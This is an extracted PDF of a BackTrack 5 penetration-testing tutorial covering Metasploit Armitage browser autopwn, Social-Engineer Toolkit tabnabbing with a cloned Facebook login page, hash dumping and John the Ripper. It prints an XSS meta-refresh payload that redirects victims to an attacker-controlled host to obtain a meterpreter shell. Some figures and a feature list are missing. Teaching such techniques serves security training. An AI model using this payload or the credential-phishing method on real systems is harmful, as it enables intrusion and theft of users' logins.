Professional Documents
Culture Documents
BackTrack 5 Tutorial 2 PDF
BackTrack 5 Tutorial 2 PDF
BackTrack 5 Tutorial 2 PDF
P a g e |2
Metasploit Armitage
Metasploit Armitage is the GUI version of the famous Metasploit framework. We did an
entire series of Metasploit tutorials on this site last month. In this part of BackTrack 5
guide, we will look at the browser autopwn exploit for Windows XP using Metasploit
Armitage.
Features of this attack:
1.
2.
3.
4.
For this exploit, you need a site with a cross-site scripting (XSS) URL redirection
vulnerability. The victim clicks on a particular URL in the browser, which spawns a
meterpreter shell in the victims system. The URL redirection code will look something
like:
http://vulnerablesite?c="><meta HTTPEQUIV="REFRESH" content="0;
url=http://attackerIPaddress ">
Figure 2: An illustration of URL redirection from an XSS vulnerable site, xyz.com, to 192.168.13.132
The auto-migration feature is used to spawn the exploit into a new process, because if
the exploit is not migrated, the whole attack will terminate when the user closes the
browser. Migration is therefore done automatically to maintain prolonged access.
Social-Engineer Toolkit
The Social-Engineer Toolkit (SET) has been covered extensively in my previous article on
this site. In this BackTrack 5 guide, I will discuss a type of attack called tab nabbing. In
this attack, the victim opens a link in a browser, but as soon as he changes to another
tab, the original page is replaced with a fake page, which allows attacker(s) to gain the
http://searchsecurity.techtarget.in/tip/BackTrack-5-Guide-II-Exploitation-tools-and-frameworks
P a g e |3
victims login credentials. The victim is duped into entering his username and password
on a fake site.
In this social engineering attack, we choose a website attack vector and the option to
clone the website. We specify the site to clone, whose login credentials we desire to
obtain. I have cloned Facebook in this BackTrack 5 guide for demonstration purposes
only*. Please note that cloning will not occur if you are not connected to the Internet
during the process.
Figure 3 of this guide shows the fake Facebook login page, and Figure 4 shows POST
data captured by the SET. This method can be extended to any URL the attacker intends
to clone; provided each of these sites have POST data, they will always be captured by
HTTP or HTTPS. SET supports both these protocols and effectively sniffs login
credentials.
Figure 3: A fake Facebook login page created by the Social Engineer Toolkit based on options set by
the attacker
http://searchsecurity.techtarget.in/tip/BackTrack-5-Guide-II-Exploitation-tools-and-frameworks
P a g e |4
Figure 4: POST Data captured by the Social Engineer Toolkit framework from a fake Facebook login
page
As seen in Figure 5 of this BackTrack 5 guide, BackTrack 5 offers four classes of privilege
escalation tools, each with a specialized area of working.
http://searchsecurity.techtarget.in/tip/BackTrack-5-Guide-II-Exploitation-tools-and-frameworks
P a g e |5
The remote system in the observation in this BackTrack 5 guide uses the following set of
usernames and passwords, as verified by John the Ripper in Figure 7.
Figure 6: The output of hashdump in the meterpreter shell which will be copied to a text file and
supplied to John the Ripper for cracking.
http://searchsecurity.techtarget.in/tip/BackTrack-5-Guide-II-Exploitation-tools-and-frameworks
P a g e |6
With these passwords in hand, we can now escalate our privileges on the target system.
In the protocol analysis category, we have Wireshark, a top class network traffic
analyzer. I have previously covered the various applications of Wireshark in an earlier
guide.
It is evident from this guide that BackTrack 5 has evolved a lot in terms of its arsenal. A
crafty attacker can make maximum use of these tools, and combine them to maximize
his benefits. This BackTrack 5 guide highlights the most important exploitation and
privilege escalation tools. In the BackTrack 5 guides to come, I will cover some more
exploitation and privilege escalation techniques.
Head to the third part of this BackTrack 5 tutorial to learn more about exploitation
frameworks.
http://searchsecurity.techtarget.in/tip/BackTrack-5-Guide-II-Exploitation-tools-and-frameworks